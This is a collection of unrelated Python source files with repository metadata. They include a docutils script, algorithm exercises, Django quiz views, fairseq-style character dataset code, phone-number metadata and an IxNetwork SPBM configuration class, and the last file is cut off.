"""
from __future__ import absolute_import
import unittest
import tbaapiv3client
from tbaapiv3client.models.match_alliance import MatchAlliance # noqa: E501
from tbaapiv3client.rest import ApiException
class TestMatchAlliance(unittest.TestCase):
"""MatchAlliance unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testMatchAlliance(self):
"""Test MatchAlliance"""
# FIXME: construct object with mandatory attributes with example values
# model = tbaapiv3client.models.match_alliance.MatchAlliance() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
8f152a314ef63e887d0f8e569075306ee1396908 | 4ae3b27a1d782ae43bc786c841cafb3ace212d55 | /Test_Slen/Pytest_proj/01/Scripts/rst2latex.py | 61137b0e6f44ef69c8780b8663fadf71a62bbb4b | []
| no_license | bopopescu/Py_projects | c9084efa5aa02fd9ff6ed8ac5c7872fedcf53e32 | a2fe4f198e3ca4026cf2e3e429ac09707d5a19de | refs/heads/master | 2022-09-29T20:50:57.354678 | 2020-04-28T05:23:14 | 2020-04-28T05:23:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 844 | py | #!c:\users\jsun\documents\py_projects\pytest_proj\01\scripts\python.exe
# $Id: rst2latex.py 5905 2009-04-16 12:04:49Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing LaTeX.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates LaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='latex', description=description)
| [
"[email protected]"
]
| |
9baf84a3f128fbdc8787947c099b5f83b777bbc7 | 1285703d35b5a37734e40121cd660e9c1a73b076 | /aizu_online_judge/tree/7_d_solution.py | 70efa80577b60594e3d0ffb0dedc8489925e85a8 | []
| no_license | takin6/algorithm-practice | 21826c711f57131108168775f08e4e13d07a3b38 | f4098bea2085a77d11c29e1593b3cc3f579c24aa | refs/heads/master | 2022-11-30T09:40:58.083766 | 2020-08-07T22:07:46 | 2020-08-07T22:07:46 | 283,609,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 985 | py | class Node():
def __init__(self, parent = -1, left = -1, right = -1):
self.parent = parent
self.left = left
self.right = right
def postorder(ns, i, post):
if ns[i].left != -1:
postorder(ns, ns[i].left, post)
if ns[i].right != -1:
postorder(ns, ns[i].right, post)
post.append(str(i + 1))
def poio_node(ns, po, io):
p = po[0]
i = io.index(p)
if i != 0:
ns[p].left = po[1]
ns[po[1]].parent = p
poio_node(ns, po[1:i + 1], io[:i])
if i != len(io) -1:
ns[p].right = po[i + 1]
ns[po[1 + i]].parent = p
poio_node(ns, po[i + 1:], io[i + 1:])
def min1(n):
return n - 1
n = int(input())
po = list(map(int, input().split()))
io = list(map(int, input().split()))
po = list(map(min1, po))
io = list(map(min1, io))
ns = [Node() for i in range(n)]
poio_node(ns, po, io)
post = []
postorder(ns, po[0], post)
print(" ".join(post)) | [
"[email protected]"
]
| |
cd8c39eff00b00f3071855b64494d6159d08584a | 45b64f620e474ac6d6b2c04fbad2730f67a62b8e | /Varsity-Final-Project-by-Django-master/.history/project/quiz/views_20210423112204.py | 7280d320c23c7ccb25ba0eff899768fde6d05502 | []
| no_license | ashimmitra/Final-Project | 99de00b691960e25b1ad05c2c680015a439277e0 | a3e1d3c9d377e7b95b3eaf4dbf757a84a3858003 | refs/heads/master | 2023-04-11T06:12:35.123255 | 2021-04-26T15:41:52 | 2021-04-26T15:41:52 | 361,796,607 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 974 | py | from django.shortcuts import render
from quiz.models import Quiz
from quiz.models import Bangla
from quiz.models import Math
from quiz.models import Science
from quiz.models import GK
#def welcome(request):
#return render(request, 'welcome.html')
def english(request):
questions = Quiz.objects.all()
return render(request, 'english.html', { 'questions': questions})
def bangla(request):
questions = Bangla.objects.all()
return render(request, 'bangla.html', { 'questions': questions})
def math(request):
questions = Math.objects.all()
return render(request, 'math.html', { 'questions': questions})
def science(request):
questions = Science.objects.all()
return render(request, 'science.html', { 'questions': questions})
def generalknowledge(request):
questions = GK.objects.all()
return render(request, 'generalknowledge.html', { 'questions': questions})
def result(request):
return render(request, 'result.html')
| [
"[email protected]"
]
| |
c0ecc3296cd811fe782785ac56a926a7383d5c13 | 128b3bb5e5e3797ea73b8d71ec479b02d2d02b75 | /py/h2o_nodes.py | 55df64bb6144d92806a795cb08cbf9c422050764 | [
"Apache-2.0"
]
| permissive | JerryZhong/h2o | 14819b044466dffe4ec461cb154898610f6be8b3 | c8ce6d223786673b5baf28f26d653bf4bd9f4ba9 | refs/heads/master | 2021-01-17T10:12:35.547837 | 2014-11-07T11:05:47 | 2014-11-07T11:05:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 292 | py |
# does the globally visible update behavior on these depend on them being mutables?
# to get rid of circular imports
# should think of managing this differently
print "h2o_nodes"
nodes = []
# used to get a browser pointing to the last RFview
global json_url_history
json_url_history = []
| [
"[email protected]"
]
| |
ccedc17ba5f223b2b46ee55cbe835f9f835c7af1 | 2cf1f60d5adcc9fe56366e26b95860a440bcb230 | /Previous Year CodeVita/Travel_Cost.py | 3818cb399113612f5e097dfbda7f072ec2e90394 | []
| no_license | rohanJa/DSA_IMP | 619a7b5c89b55cbff3c77b265242c05ebedd6140 | b0ead018814d53a00cc47cda1915ad0dfe5c30dc | refs/heads/master | 2022-12-23T22:56:32.775027 | 2020-09-01T06:52:25 | 2020-09-01T06:52:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 463 | py | import heapq
N = int(input())
cities = list(map(int, input().split(' ')))
M = int(input())
if(len(cities)<=1 or cities[-1]==-1):
print(-1)
else:
cost = cities[0] + cities[-1]
cities = cities[1:len(cities)-1]
heapq.heapify(cities)
for i in range(0,len(cities)):
if(cities[i]==-1):
M-=1
else:
cost+=cities[i]
if(M<0):
print(-1)
else:
print(cost - sum(heapq.nlargest(M,cities)))
| [
"[email protected]"
]
| |
741f4f977054d674b6570a9cbd439392f1bdf378 | c8a0f1ee8ca4b27d6b71e1a358f950a5f168b953 | /Sessão 4/Atributos de classe/Encapsulamento.py | cf204b06b1de3f55ff1b2bc2ec9d5e83d5a6d641 | []
| no_license | natanaelfelix/Estudos | 0c3a54903a5ac457c1c1cfbdc22202683c46b62c | 10b33fa7cb8521d63ea6a14c04894a5f7e86ee0c | refs/heads/master | 2022-12-16T12:07:45.088305 | 2020-09-19T19:56:07 | 2020-09-19T19:56:07 | 296,936,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,553 | py | #esconde codigos em python
'''
public, # metodos e atributos podem ser acesso dentro e fora da class,
protect # atributos que podem ser acesso apenas dentro da classe ou nas filhas da classe
private # atributo ou metodo só está disponível dentro da classe
em python:
isso é chamado de convenção
_ = é o mesmo que é privado, as é um protected mais fraco
__ = é o mesmo que privado, diz que não se deve usar em hipotese nenhuma
para acessar o real do pivado:
(instancia_nomedaclasse__nomedoatributo)
#tudo isso para proteger a aplicação
'''
class BaseDeDados:
def __init__(self):
#self.dados = {} # essa é publica, acessada de dentro e fora da classe, caso seja mudado esse valor de variável quebra toda a classe
#self.__dados = {} #usando o _ na frente do nome ele diz q é privado e não consiguimos utilizar de fora
self.__dados = {} #usando so dois __ ele não deixa utilizar, se caso utilizarmo sd fora ele cria outro atributo
def inserir_cliente(self, id, nome):
if 'clientes' not in self.__dados:
self.__dados['clientes'] = {id: nome}
else:
self.__dados['clientes'].update({id: nome})
def lista_clientes(self):
for id, nome in self.__dados['clientes'].items():
print(id, nome)
def apaga_cliente(self, id):
del self.__dados['clientes'][id]
bd = BaseDeDados()
bd.inserir_cliente(1, 'Adriano')
bd.inserir_cliente(2, 'Ronaldo')
bd.inserir_cliente(3, 'Priscila')
bd.apaga_cliente(2)
bd.lista_clientes()
print(bd.__dados)
| [
"[email protected]"
]
| |
597dd8723ef677cd5e0dad4d6aa1daa7d951b79b | 6d4a7f3f069e68a984df61b718e39597370a1131 | /main/getmail | 0b93cfc2d2cab97af7695d7546feb81af95b343b | []
| no_license | nabiuddin6/scripts-1 | d7c32a483c1ed4fcca2df3d68bf29cabf81f69c7 | 7a36fa22cfc369ccc5038332f95779370b12507c | refs/heads/master | 2022-09-01T07:14:31.211758 | 2020-05-30T19:20:02 | 2020-05-30T19:20:02 | 270,788,454 | 1 | 0 | null | 2020-06-08T18:55:19 | 2020-06-08T18:55:18 | null | UTF-8 | Python | false | false | 158 | #!/usr/bin/env python3
from fileinput import input as finput
with open("/tmp/mymail.txt", "w") as f:
for line in finput():
print(line, file=f)
| [
"[email protected]"
]
| ||
e1fc711cbdafa14788ed3999fffb04e0286d794c | 927cd757e5ad55293406ab21da05805f172c06aa | /pytorch_translate/data/char_data.py | 694dcbccfc79dea90938d52c57cafdc25eed2a4a | [
"BSD-3-Clause"
]
| permissive | rohan-varma/translate | 5b0f2a8a645b4bcca9355bdb515773ce89a5bb70 | 56d6e9d53da70104f3ac42f99edb0324af2e2304 | refs/heads/master | 2020-07-05T22:44:30.587754 | 2019-08-14T23:06:40 | 2019-08-14T23:10:19 | 202,805,101 | 0 | 0 | null | 2019-08-16T22:08:43 | 2019-08-16T22:08:42 | null | UTF-8 | Python | false | false | 18,513 | py | #!/usr/bin/env python3
from typing import Any, Dict
import numpy as np
import torch
from fairseq import data, tokenizer
from pytorch_translate import vocab_constants
from pytorch_translate.data.dictionary import TAGS
class InMemoryNumpyWordCharDataset(data.indexed_dataset.IndexedDataset):
"""analogous to fairseq.data.IndexedCachedDataset"""
def __init__(self):
"""Initialize empty dataset"""
self.word_buffer = None
self.word_offsets = None
self.char_buffer = None
self.char_offsets = None
self.sizes = None
def get_tokens(self, i):
"""Get tensor of token indices for example i"""
assert i < self.__len__(), f"index {i} out of range!"
a = self.word_buffer[self.word_offsets[i] : self.word_offsets[i + 1]]
return torch.from_numpy(a)
def get_chars_list(self, i):
"""Get list of tensors of character indices for example i"""
result = []
for word_index in range(self.word_offsets[i], self.word_offsets[i + 1]):
char_indices = self.char_buffer[
self.char_offsets[word_index] : self.char_offsets[word_index + 1]
]
result.append(torch.from_numpy(char_indices))
return result
def __len__(self):
# offsets includes 0 and end indices for each example
return self.word_offsets.size - 1
def __del__(self):
pass
def save(self, path):
assert self.word_buffer is not None
assert self.word_offsets is not None
assert self.char_buffer is not None
assert self.char_offsets is not None
np.savez(
path,
word_buffer=self.word_buffer,
word_offsets=self.word_offsets,
char_buffer=self.char_buffer,
char_offsets=self.char_offsets,
)
def load(self, path):
npz = np.load(path)
if "char_buffer" not in npz or "char_offsets" not in npz:
raise RuntimeError(f"{path} does not appear to be a word-char dataset!")
self.word_buffer = npz["word_buffer"]
self.word_offsets = npz["word_offsets"]
self.sizes = self.word_offsets[1:] - self.word_offsets[:-1]
self.char_buffer = npz["char_buffer"]
self.char_offsets = npz["char_offsets"]
def _sent_to_word_ids(
self, sent, word_dict, reverse_order, prepend_inds, append_inds
):
"""
Extract the word ids for words associated with the input sentence.
"""
words = tokenizer.tokenize_line(sent)
if reverse_order:
words.reverse()
word_inds = [word_dict.index(w) for w in words]
word_inds = prepend_inds + word_inds + append_inds
return words, word_inds
def _word_to_char_ids(self, word, char_dict, embed_bytes):
"""
Extract the char/byte ids for char/bytes associated with the input word.
"""
if embed_bytes:
# The byte_id needs to be incremented by 1 to account for the
# padding id (0) in the embedding table
char_inds = (
[vocab_constants.NUM_BYTE_INDICES + TAGS.index(word) + 1]
if word in TAGS
else [byte_id + 1 for byte_id in word.encode("utf8", "ignore")]
)
else:
chars = [word] if word in TAGS else list(word)
char_inds = [char_dict.index(c) for c in chars]
return char_inds
def parse(
self,
path,
word_dict,
char_dict,
embed_bytes=False,
reverse_order=False,
append_eos=False,
):
word_array_list = []
word_offsets = [0]
char_array_list = []
char_offsets = [0]
sizes = []
prepend_inds = []
append_inds = []
if append_eos:
append_inds.append(word_dict.eos_index)
with open(path, "r") as f:
for line in f:
words, word_inds = self._sent_to_word_ids(
sent=line,
word_dict=word_dict,
reverse_order=reverse_order,
prepend_inds=prepend_inds,
append_inds=append_inds,
)
word_array_list.append(np.array(word_inds, dtype=np.int32))
word_offsets.append(word_offsets[-1] + len(word_inds))
sizes.append(len(word_inds))
for word in words:
char_inds = self._word_to_char_ids(word, char_dict, embed_bytes)
char_array_list.append(np.array(char_inds, dtype=np.int32))
char_offsets.append(char_offsets[-1] + len(char_inds))
if append_eos:
char_inds = [char_dict.eos_index]
char_array_list.append(np.array(char_inds, dtype=np.int32))
char_offsets.append(char_offsets[-1] + len(char_inds))
self.word_buffer = np.concatenate(word_array_list)
self.word_offsets = np.array(word_offsets, dtype=np.int64)
self.char_buffer = np.concatenate(char_array_list)
self.char_offsets = np.array(char_offsets, dtype=np.int64)
self.sizes = np.array(sizes, dtype=np.int32)
del word_array_list, word_offsets, char_array_list, char_offsets, sizes
def parse_multilingual(
self,
corpora,
reverse_order,
append_eos,
embed_bytes,
prepend_language_id,
already_numberized,
):
word_array_list = []
word_offsets = [0]
char_array_list = []
char_offsets = [0]
sizes = []
for corpus_config in corpora:
prepend_inds = []
append_inds = []
if append_eos:
append_inds.append(corpus_config.dict.eos_index)
if corpus_config.dialect_id is not None:
if prepend_language_id:
prepend_inds.append(corpus_config.dialect_id)
else:
append_inds.append(corpus_config.dialect_id)
with open(corpus_config.data_file, "r") as f:
for line in f:
words, word_inds = self._sent_to_word_ids(
sent=line,
word_dict=corpus_config.dict,
reverse_order=reverse_order,
prepend_inds=prepend_inds,
append_inds=append_inds,
)
word_array_list.append(np.array(word_inds, dtype=np.int32))
word_offsets.append(word_offsets[-1] + len(word_inds))
sizes.append(len(word_inds))
for word in words:
char_inds = self._word_to_char_ids(
word=word,
char_dict=corpus_config.char_dict,
embed_bytes=embed_bytes,
)
char_array_list.append(np.array(char_inds, dtype=np.int32))
char_offsets.append(char_offsets[-1] + len(char_inds))
if append_eos:
char_inds = [corpus_config.char_dict.eos_index]
char_array_list.append(np.array(char_inds, dtype=np.int32))
char_offsets.append(char_offsets[-1] + len(char_inds))
self.word_buffer = np.concatenate(word_array_list)
self.word_offsets = np.array(word_offsets, dtype=np.int32)
self.char_buffer = np.concatenate(char_array_list)
self.char_offsets = np.array(char_offsets, dtype=np.int32)
self.sizes = np.array(sizes, dtype=np.int32)
del word_array_list, word_offsets, char_array_list, char_offsets, sizes
@staticmethod
def create_from_file(path):
result = InMemoryNumpyWordCharDataset()
result.load(path)
return result
def subsample(self, indices):
"""
Subsample dataset to include only those items indexed by input
argument indices.
"""
word_array_list = []
word_offsets = [0]
char_array_list = []
char_offsets = [0]
sizes = []
for i in indices:
word_inds = self.word_buffer[
self.word_offsets[i] : self.word_offsets[i + 1]
]
word_array_list.append(word_inds)
word_offsets.append(word_offsets[-1] + len(word_inds))
sizes.append(len(word_inds))
for word_index in range(self.word_offsets[i], self.word_offsets[i + 1]):
char_inds = self.char_buffer[
self.char_offsets[word_index] : self.char_offsets[word_index + 1]
]
char_array_list.append(char_inds)
char_offsets.append(char_offsets[-1] + len(char_inds))
self.word_buffer = np.concatenate(word_array_list)
self.word_offsets = np.array(word_offsets, dtype=np.int32)
self.char_buffer = np.concatenate(char_array_list)
self.char_offsets = np.array(char_offsets, dtype=np.int32)
self.sizes = np.array(sizes, dtype=np.int32)
class LanguagePairSourceCharDataset(data.LanguagePairDataset):
"""
Version of fairseq.data.LanguagePairDataset which represents source
sentences as sequences of words, each represented as a sequence of
characters (with numberized indices for both words and characters).
Right-padded only.
"""
def __init__(
self,
src,
src_sizes,
src_dict,
tgt=None,
tgt_sizes=None,
tgt_dict=None,
weights=None,
):
"""
src : InMemoryNumpyWordCharDataset
tgt : InMemoryNumpyDataset
weights: Optional[IndexedInMemoryDataset]
"""
super().__init__(
src,
src_sizes,
src_dict,
tgt,
tgt_sizes,
tgt_dict,
left_pad_source=False,
left_pad_target=False,
)
self.pad_idx = src_dict.pad()
self.eos_idx = src_dict.eos()
self.weights = weights
def get_src_maybe_with_weights(self, i):
example = {
"id": i,
"source_tokens": self.src.get_tokens(i).long(),
"source_chars_list": self.src.get_chars_list(i),
}
if self.weights:
"""
If weight for example is missing, use last seen weight. Sometimes we
just want to assign a weight to the entire dataset with a single value
but also maintain the IndexedInMemoryDataset convention of weights.
This way, even if we don't care/know about dataset size, we can
assign same weight to all examples.
"""
if len(self.weights) <= i:
example["weight"] = self.weights[-1]
else:
example["weight"] = self.weights[i]
else:
example["weight"] = 1.0
return example
def __getitem__(self, i):
example = self.get_src_maybe_with_weights(i)
if self.tgt:
example["target"] = self.tgt[i].long()
return example
def __len__(self):
"""Length in words"""
return len(self.src)
def collate_source(self, samples) -> Dict[str, Any]:
# sort in order of descending number of words
samples.sort(key=lambda s: len(s["source_tokens"]), reverse=True)
max_words = len(samples[0]["source_tokens"])
id = torch.LongTensor([s["id"] for s in samples])
src_lengths = torch.LongTensor([len(s["source_tokens"]) for s in samples])
weights = torch.FloatTensor([s["weight"] for s in samples])
word_lengths = torch.LongTensor(len(samples), max_words).fill_(0)
for i, s in enumerate(samples):
word_lengths_array = np.array([len(w) for w in s["source_chars_list"]])
word_lengths[i, : word_lengths_array.size] = torch.LongTensor(
word_lengths_array
)
max_word_length = int(word_lengths.max())
src_tokens = (
samples[0]["source_tokens"].new(len(samples), max_words).fill_(self.pad_idx)
)
for i, s in enumerate(samples):
src_tokens[i, : len(s["source_tokens"])] = s["source_tokens"]
char_inds = (
samples[0]["source_chars_list"][0]
.new(len(samples), max_words, max_word_length)
.long()
.fill_(self.pad_idx)
)
for i, s in enumerate(samples):
chars_list = s["source_chars_list"]
for j, chars in enumerate(chars_list):
char_inds[i, j, : word_lengths[i, j]] = chars
return {
"id": id,
"src_tokens": src_tokens,
"src_lengths": src_lengths,
"char_inds": char_inds,
"word_lengths": word_lengths,
"weights": weights,
}
def collate_targets(self, samples):
def merge(move_eos_to_beginning=False):
return data.data_utils.collate_tokens(
[s["target"] for s in samples],
self.pad_idx,
self.eos_idx,
left_pad=False,
move_eos_to_beginning=move_eos_to_beginning,
)
target = merge(move_eos_to_beginning=False)
prev_output_tokens = merge(move_eos_to_beginning=True)
ntokens = sum(len(s["target"]) for s in samples)
return target, prev_output_tokens, ntokens
def collater(self, samples):
if len(samples) == 0:
return {}
source_data = self.collate_source(samples)
target, prev_output_tokens, ntokens = None, None, None
if self.tgt:
target, prev_output_tokens, ntokens = self.collate_targets(samples)
return {
"id": source_data["id"],
"ntokens": ntokens,
"net_input": {
"src_tokens": source_data["src_tokens"],
"src_lengths": source_data["src_lengths"],
"char_inds": source_data["char_inds"],
"word_lengths": source_data["word_lengths"],
"prev_output_tokens": prev_output_tokens,
},
"target": target,
"weights": source_data["weights"],
}
class LanguagePairCharDataset(LanguagePairSourceCharDataset):
"""
Version of fairseq.data.LanguagePairDataset which represents source
and target sentences as sequences of words, each represented as a
sequence of characters (with numberized indices for both words and
characters).
Right-padded only.
"""
def __init__(
self,
src: InMemoryNumpyWordCharDataset,
src_sizes,
src_dict,
tgt: InMemoryNumpyWordCharDataset = None,
tgt_sizes=None,
tgt_dict=None,
weights=None,
):
super().__init__(src, src_sizes, src_dict, tgt, tgt_sizes, tgt_dict)
def __getitem__(self, i):
example = self.get_src_maybe_with_weights(i)
if self.tgt:
example["target"] = self.tgt.get_tokens(i).long()
example["target_chars_list"] = self.tgt.get_chars_list(i)
return example
def collate_tgt_chars(self, samples) -> Dict[str, Any]:
max_tgt_words = max(len(s["target"]) for s in samples)
tgt_word_lengths = torch.LongTensor(len(samples), max_tgt_words).fill_(0)
for i, s in enumerate(samples):
word_lengths_array = np.array([len(w) for w in s["target_chars_list"]])
tgt_word_lengths[i, : word_lengths_array.size] = torch.LongTensor(
word_lengths_array
)
max_tgt_word_length = int(tgt_word_lengths.max())
tgt_char_inds = (
samples[0]["target_chars_list"][0]
.new(len(samples), max_tgt_words, max_tgt_word_length)
.long()
.fill_(self.pad_idx)
)
prev_tgt_char_inds = (
samples[0]["target_chars_list"][0]
.new(len(samples), max_tgt_words + 1, max_tgt_word_length)
.long()
.fill_(self.pad_idx)
)
eos_tensor = torch.tensor([self.eos_idx])
for i, s in enumerate(samples):
chars_list = s["target_chars_list"]
prev_tgt_char_inds[i, 0, :1] = eos_tensor
for j, chars in enumerate(chars_list):
tgt_char_inds[i, j, : tgt_word_lengths[i, j]] = chars
prev_tgt_char_inds[i, j + 1, : tgt_word_lengths[i, j]] = chars
prev_tgt_word_lengths = torch.cat(
(torch.ones((len(samples), 1), dtype=torch.long), tgt_word_lengths), dim=1
)
return {
"prev_tgt_char_inds": prev_tgt_char_inds,
"tgt_char_inds": tgt_char_inds,
"tgt_word_lengths": tgt_word_lengths,
"prev_tgt_word_lengths": prev_tgt_word_lengths,
}
def collater(self, samples):
if len(samples) == 0:
return {}
source_data = self.collate_source(samples)
target_toks, prev_output_tokens, ntokens = None, None, None
prev_tgt_char_inds, tgt_char_inds, tgt_word_lengths = None, None, None
prev_tgt_word_lengths = None
if self.tgt:
target_toks, prev_output_tokens, ntokens = self.collate_targets(samples)
tgt_char_data = self.collate_tgt_chars(samples)
prev_tgt_char_inds = tgt_char_data["prev_tgt_char_inds"]
tgt_char_inds = tgt_char_data["tgt_char_inds"]
tgt_word_lengths = tgt_char_data["tgt_word_lengths"]
prev_tgt_word_lengths = tgt_char_data["prev_tgt_word_lengths"]
return {
"id": source_data["id"],
"ntokens": ntokens,
"net_input": {
"src_tokens": source_data["src_tokens"],
"src_lengths": source_data["src_lengths"],
"char_inds": source_data["char_inds"],
"word_lengths": source_data["word_lengths"],
"prev_output_tokens": prev_output_tokens,
"prev_output_chars": prev_tgt_char_inds,
"prev_output_word_lengths": prev_tgt_word_lengths,
},
"target": target_toks,
"target_char_inds": tgt_char_inds,
"tgt_word_lengths": tgt_word_lengths,
"weights": source_data["weights"],
}
| [
"[email protected]"
]
| |
29ca22271235f65d4e77228e17670c71e65dcf24 | 6d9fbe6e6a2abfd8455e92f6dba67a5f02d87f41 | /lib/phonenumbers/data/region_NO.py | 209547037b31ee8b2a5a3323313d1cb0da54ac21 | []
| no_license | JamesBrace/InfluenceUWebLaunch | 549d0b48ff3259b139cb891a19cb8b5382ffe2c8 | 332d25940e4b1b45a7a2a8200f77c8413543b199 | refs/heads/master | 2021-09-04T04:08:47.594900 | 2018-01-15T16:49:29 | 2018-01-15T16:49:29 | 80,778,825 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,317 | py | """Auto-generated file, do not edit by hand. NO metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_NO = PhoneMetadata(id='NO', country_code=47, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='0\\d{4}|[2-9]\\d{7}', possible_number_pattern='\\d{5}(?:\\d{3})?', possible_length=(5, 8)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:2[1-4]|3[1-3578]|5[1-35-7]|6[1-4679]|7[0-8])\\d{6}', possible_number_pattern='\\d{8}', example_number='21234567', possible_length=(8,)),
mobile=PhoneNumberDesc(national_number_pattern='(?:4[015-8]|5[89]|87|9\\d)\\d{6}', possible_number_pattern='\\d{8}', example_number='40612345', possible_length=(8,)),
toll_free=PhoneNumberDesc(national_number_pattern='80[01]\\d{5}', possible_number_pattern='\\d{8}', example_number='80012345', possible_length=(8,)),
premium_rate=PhoneNumberDesc(national_number_pattern='82[09]\\d{5}', possible_number_pattern='\\d{8}', example_number='82012345', possible_length=(8,)),
shared_cost=PhoneNumberDesc(national_number_pattern='810(?:0[0-6]|[2-8]\\d)\\d{3}', possible_number_pattern='\\d{8}', example_number='81021234', possible_length=(8,)),
personal_number=PhoneNumberDesc(national_number_pattern='880\\d{5}', possible_number_pattern='\\d{8}', example_number='88012345', possible_length=(8,)),
voip=PhoneNumberDesc(national_number_pattern='85[0-5]\\d{5}', possible_number_pattern='\\d{8}', example_number='85012345', possible_length=(8,)),
pager=PhoneNumberDesc(),
uan=PhoneNumberDesc(national_number_pattern='0\\d{4}|81(?:0(?:0[7-9]|1\\d)|5\\d{2})\\d{3}', possible_number_pattern='\\d{5}(?:\\d{3})?', example_number='01234', possible_length=(5, 8)),
voicemail=PhoneNumberDesc(national_number_pattern='81[23]\\d{5}', possible_number_pattern='\\d{8}', example_number='81212345', possible_length=(8,)),
no_international_dialling=PhoneNumberDesc(),
number_format=[NumberFormat(pattern='([489]\\d{2})(\\d{2})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[489]']),
NumberFormat(pattern='([235-7]\\d)(\\d{2})(\\d{2})(\\d{2})', format='\\1 \\2 \\3 \\4', leading_digits_pattern=['[235-7]'])],
main_country_for_code=True,
leading_zero_possible=True,
mobile_number_portable_region=True)
| [
"[email protected]"
]
| |
c0a8764e80dbd852a83561d0dfc1ab421435e6b6 | d12b59b33df5c467abf081d48e043dac70cc5a9c | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/spbmnodebasevidrange_81d2c633816492894c7a12f8e3079130.py | 9d2318916d50cd18a199cb2e1fdd10a83d0ec736 | [
"MIT"
]
| permissive | ajbalogh/ixnetwork_restpy | 59ce20b88c1f99f95a980ff01106bda8f4ad5a0f | 60a107e84fd8c1a32e24500259738e11740069fd | refs/heads/master | 2023-04-02T22:01:51.088515 | 2021-04-09T18:39:28 | 2021-04-09T18:39:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,678 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class SpbmNodeBaseVidRange(Base):
"""The SPBM Node Base VLAN ID Range.
The SpbmNodeBaseVidRange class encapsulates a list of spbmNodeBaseVidRange resources that are managed by the user.
A list of resources can be retrieved from the server using the SpbmNodeBaseVidRange.find() method.
The list can be managed by using the SpbmNodeBaseVidRange.add() and SpbmNodeBaseVidRange.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'spbmNodeBaseVidRange'
_SDM_ATT_MAP = {
'BVlanPriority': 'bVlanPriority',
'BVlanTpId': 'bVlanTpId',
'BaseVid': 'baseVid',
'EctAlgorithm': 'ectAlgorithm',
'UseFlag': 'useFlag',
}
def __init__(self, parent):
super(SpbmNodeBaseVidRange, self).__init__(parent)
@property
def SpbmNodeIsIdRange(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.spbmnodeisidrange_a3510ccafe15d43e458301835ca1b3b9.SpbmNodeIsIdRange): An instance of the SpbmNodeIsIdRange class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.spbmnodeisidrange_a3510ccafe15d43e458301835ca1b3b9 import SpbmNodeIsIdRange
return SpbmNodeIsIdRange(self)
@property
def BVlanPriority(self):
"""
Returns
-------
- number: The user priority of the Base VLAN.
"""
return self._get_attribute(self._SDM_ATT_MAP['BVlanPriority'])
@BVlanPriority.setter
def BVlanPriority(self, value):
self._set_attribute(self._SDM_ATT_MAP['BVlanPriority'], value)
@property
def BVlanTpId(self):
"""
Returns
-------
- number: The tag priority identifier for base VLAN.
"""
return self._get_attribute(self._SDM_ATT_MAP['BVlanTpId'])
@BVlanTpId.setter
def BVlanTpId(self, value):
self._set_attribute(self._SDM_ATT_MAP['BVlanTpId'], value)
@property
def BaseVid(self):
"""
Returns
-------
- number: The Base VLAN ID. The default value is 1. The maximum value is 4095. The minimum value is 0.
"""
return self._get_attribute(self._SDM_ATT_MAP['BaseVid'])
@BaseVid.setter
def BaseVid(self, value):
self._set_attribute(self._SDM_ATT_MAP['BaseVid'], value)
@property
def EctAlgorithm(self):
"""
Returns
-------
- number: The SPB Equal Cost Tree (ECT) algorithm. The default algorithm is 01-80-C2-01.
"""
return self._get_attribute(self._SDM_ATT_MAP['EctAlgorithm'])
@EctAlgorithm.setter
def EctAlgorithm(self, value):
self._set_attribute(self._SDM_ATT_MAP['EctAlgorithm'], value)
@property
def UseFlag(self):
"""
Returns
-------
- bool: Set to true to activate the user flag.
"""
return self._get_attribute(self._SDM_ATT_MAP['UseFlag'])
@UseFlag.setter
def UseFlag(self, value):
self._set_attribute(self._SDM_ATT_MAP['UseFlag'], value)
def update(self, BVlanPriority=None, BVlanTpId=None, BaseVid=None, EctAlgorithm=None, UseFlag=None):
"""Updates spbmNodeBaseVidRange resource on the server.
Args
----
- BVlanPriority (number): The user priority of the Base VLAN.
